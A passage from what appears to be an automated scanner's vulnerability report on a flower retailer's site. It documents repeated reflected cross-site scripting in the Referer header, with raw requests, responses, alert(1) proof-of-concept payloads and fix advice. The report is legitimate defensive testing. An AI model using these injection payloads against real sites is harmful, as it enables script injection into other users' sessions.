X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:10 GMT
Connection: close
Content-Length: 116164


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
rOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30040149","30040149","30040149","0","5","organicgglgeneric_d4ea6\\";alert(1)//d0957e0f75c","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pfl-2,cnd-30,pvo-1,pbr-4,pcy-7,psk-2,poe-2,zzc-2,pjs-1,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-2,nte-1,ntc-2,peo-2,pfp-2,phr-2,pjt-2,psv-3,
...[SNIP]...

2.136. http://products.proflowers.com/flowers/Christmas-Growers-Choice-30003196 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Christmas-Growers-Choice-30003196

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96581\"%3balert(1)//c93db7aaf3 was submitted in the Referer HTTP header. This input was echoed as 96581\\";alert(1)//c93db7aaf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Christmas-Growers-Choice-30003196 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=96581\"%3balert(1)//c93db7aaf3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=1m1g0avevn4mxvcim3okk1nt; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=1m1g0avevn4mxvcim3okk1nt; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pjt-2,cnd-33,pvo-2,pbr-4,psk-2,pps-1,poe-1,zzc-1,pjs-3,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-1,nte-1,ntc-1,peo-1,pfp-1,phr-1,zza-2,psv-4,nta-1,ntb-1,pmo-1,ppr-2,spg-2,xpc-1,psr-1,pcy-7,zzb-2,gfr-2,apg-1,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:54:39 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:54:39 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=30; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:54:39 GMT; path=/
Set-Cookie: PFC_BrowserId=273be360-148f-46ff-8283-185b1c96539c; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30003196&12/16/2010 11:54:40 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:54:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:41 GMT
Connection: close
Content-Length: 203960


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30003196","30003196","30003196","326817","30","organicgglgeneric_96581\\";alert(1)//c93db7aaf3","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pfl-2,cnd-33,pvo-2,pbr-4,pcy-7,psk-2,poe-1,zzc-1,pjs-3,pcu-1,spg-2,mpsmediapersonalitysplit-1,ntd-1,nte-1,ntc-1,peo-1,pfp-1,phr-1,pjt-2,psv-4,
...[SNIP]...

2.137. http://products.proflowers.com/flowers/Deluxe-Holiday-Treasures-40559 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Holiday-Treasures-40559

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84656\"%3balert(1)//68cbeb4ea98 was submitted in the Referer HTTP header. This input was echoed as 84656\\";alert(1)//68cbeb4ea98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Holiday-Treasures-40559 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=84656\"%3balert(1)//68cbeb4ea98

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=ydstqb1dzgbehdjspi4go4v3; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=ydstqb1dzgbehdjspi4go4v3; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-2,cnd-31,pvo-1,pbr-4,psk-1,pps-1,poe-2,zzc-2,pjs-3,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-2,nte-3,ntc-2,peo-1,pfp-1,phr-2,zza-2,psv-3,nta-1,ntb-1,pmo-1,ppr-1,spg-1,xpc-1,psr-2,pcy-6,zzb-2,gfr-1,apg-1,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:27 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:27 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=27; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:27 GMT; path=/
Set-Cookie: PFC_BrowserId=7d221c47-883c-458a-8f8b-609415e069f8; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=40559&12/16/2010 11:55:29 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:29 GMT
Connection: close
Content-Length: 151519


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("40559","40559","40559","200731","27","organicgglgeneric_84656\\";alert(1)//68cbeb4ea98","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-2,cnd-31,pvo-1,pbr-4,pcy-6,psk-1,poe-2,zzc-2,pjs-3,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-2,nte-3,ntc-2,peo-1,pfp-1,phr-2,pjt-2,psv-3,
...[SNIP]...

2.138. http://products.proflowers.com/flowers/Deluxe-Santas-Sleigh-30044909 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Santas-Sleigh-30044909

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 754bd\"%3balert(1)//8cefc208bdf was submitted in the Referer HTTP header. This input was echoed as 754bd\\";alert(1)//8cefc208bdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Santas-Sleigh-30044909 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=754bd\"%3balert(1)//8cefc208bdf

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=0xc11q4deew31gednt2l0qpe; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=0xc11q4deew31gednt2l0qpe; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-2,pso-1,pjt-1,cnd-31,pvo-1,pbr-3,psk-1,pps-1,poe-2,zzc-2,pjs-2,pcu-1,pfl-2,mpsmediapersonalitysplit-2,ntd-2,nte-3,ntc-1,peo-2,pfp-2,phr-2,zza-1,psv-3,nta-1,ntb-1,pmo-1,ppr-2,spg-1,xpc-1,psr-2,pcy-5,zzb-1,gfr-1,apg-1,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:54:28 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:54:28 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=129; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:54:28 GMT; path=/
Set-Cookie: PFC_BrowserId=22bda1c6-36a3-4502-8179-77041b4363ff; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30044909&12/16/2010 11:54:31 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:54:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:32 GMT
Connection: close
Content-Length: 136639


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
nZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30044909","30044909","30044909","0","129","organicgglgeneric_754bd\\";alert(1)//8cefc208bdf","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-2,pso-1,pfl-2,cnd-31,pvo-1,pbr-3,pcy-5,psk-1,poe-2,zzc-2,pjs-2,pcu-1,spg-1,mpsmediapersonalitysplit-2,ntd-2,nte-3,ntc-1,peo-2,pfp-2,phr-2,pjt-1,psv-3,
...[SNIP]...

2.139. http://products.proflowers.com/flowers/Holiday-Favorites-30034411 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Holiday-Favorites-30034411

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36055\"%3balert(1)//f6660f14f3c was submitted in the Referer HTTP header. This input was echoed as 36055\\";alert(1)//f6660f14f3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Holiday-Favorites-30034411 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=36055\"%3balert(1)//f6660f14f3c

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=omnzoucukuuniqcxuxinph20; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=omnzoucukuuniqcxuxinph20; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pjt-1,cnd-34,pvo-2,pbr-3,psk-2,pps-1,poe-1,zzc-2,pjs-1,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-2,nte-2,ntc-1,peo-1,pfp-2,phr-1,zza-1,psv-3,nta-1,ntb-2,pmo-1,ppr-1,spg-1,xpc-1,psr-2,pcy-6,zzb-2,gfr-2,apg-2,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:54:15 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:54:15 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=38; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:54:15 GMT; path=/
Set-Cookie: PFC_BrowserId=0e67995b-0b05-4cf6-a5c4-77ff063980f4; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30034411&12/16/2010 11:54:17 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:54:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:18 GMT
Connection: close
Content-Length: 184119


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
OnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30034411","30034411","30034411","0","38","organicgglgeneric_36055\\";alert(1)//f6660f14f3c","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pfl-2,cnd-34,pvo-2,pbr-3,pcy-6,psk-2,poe-1,zzc-2,pjs-1,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-2,nte-2,ntc-1,peo-1,pfp-2,phr-1,pjt-1,psv-3,
...[SNIP]...

2.140. http://products.proflowers.com/flowers/Holiday-Hugs-and-Kisses-40502 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Holiday-Hugs-and-Kisses-40502

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bce1b\"%3balert(1)//1a450b9cf5a was submitted in the Referer HTTP header. This input was echoed as bce1b\\";alert(1)//1a450b9cf5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Holiday-Hugs-and-Kisses-40502 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bce1b\"%3balert(1)//1a450b9cf5a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=cqyjycgi33io2eg4uwcynbny; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=cqyjycgi33io2eg4uwcynbny; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-2,cnd-33,pvo-2,pbr-3,psk-2,pps-1,poe-2,zzc-2,pjs-2,pcu-1,pfl-1,mpsmediapersonalitysplit-2,ntd-1,nte-1,ntc-1,peo-1,pfp-1,phr-1,zza-2,psv-3,nta-1,ntb-2,pmo-1,ppr-2,spg-1,xpc-1,psr-2,pcy-8,zzb-1,gfr-2,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:25 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:25 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=25; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:25 GMT; path=/
Set-Cookie: PFC_BrowserId=012ca506-9269-4260-b4d7-5e63241f1347; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=40502&12/16/2010 11:55:26 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:26 GMT
Connection: close
Content-Length: 201943


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("40502","40502","40502","222943","25","organicgglgeneric_bce1b\\";alert(1)//1a450b9cf5a","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-1,cnd-33,pvo-2,pbr-3,pcy-8,psk-2,poe-2,zzc-2,pjs-2,pcu-1,spg-1,mpsmediapersonalitysplit-2,ntd-1,nte-1,ntc-1,peo-1,pfp-1,phr-1,pjt-2,psv-3,
...[SNIP]...

2.141. http://products.proflowers.com/flowers/Holiday-Tradition-with-Elegant-Ruby-Vase-30004379 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Holiday-Tradition-with-Elegant-Ruby-Vase-30004379

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a42ec\"%3balert(1)//ac7c7304e9c was submitted in the Referer HTTP header. This input was echoed as a42ec\\";alert(1)//ac7c7304e9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Holiday-Tradition-with-Elegant-Ruby-Vase-30004379 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a42ec\"%3balert(1)//ac7c7304e9c

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=yddgtlvqg52do5jb54wuyssw; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=yddgtlvqg52do5jb54wuyssw; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-1,cnd-33,pvo-1,pbr-4,psk-1,pps-2,poe-1,zzc-1,pjs-1,pcu-1,pfl-1,mpsmediapersonalitysplit-2,ntd-1,nte-3,ntc-1,peo-1,pfp-1,phr-2,zza-2,psv-4,nta-2,ntb-2,pmo-1,ppr-2,spg-1,xpc-1,psr-1,pcy-5,zzb-1,gfr-2,apg-2,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:54:00 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:54:00 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=62; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:54:00 GMT; path=/
Set-Cookie: PFC_BrowserId=2e29d0ee-6e7e-42bd-9e48-b4f54fc2b1f8; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30004379&12/16/2010 11:54:04 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:54:04 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:04 GMT
Connection: close
Content-Length: 185834


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30004379","30004379","30004379","196196","62","organicgglgeneric_a42ec\\";alert(1)//ac7c7304e9c","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-1,cnd-33,pvo-1,pbr-4,pcy-5,psk-1,poe-1,zzc-1,pjs-1,pcu-1,spg-1,mpsmediapersonalitysplit-2,ntd-1,nte-3,ntc-1,peo-1,pfp-1,phr-2,pjt-1,psv-4,
...[SNIP]...

2.142. http://products.proflowers.com/flowers/Hugs--Kisses-30000122 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Hugs--Kisses-30000122

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de17e\"%3balert(1)//5414c7fdcb2 was submitted in the Referer HTTP header. This input was echoed as de17e\\";alert(1)//5414c7fdcb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Hugs--Kisses-30000122 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=de17e\"%3balert(1)//5414c7fdcb2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
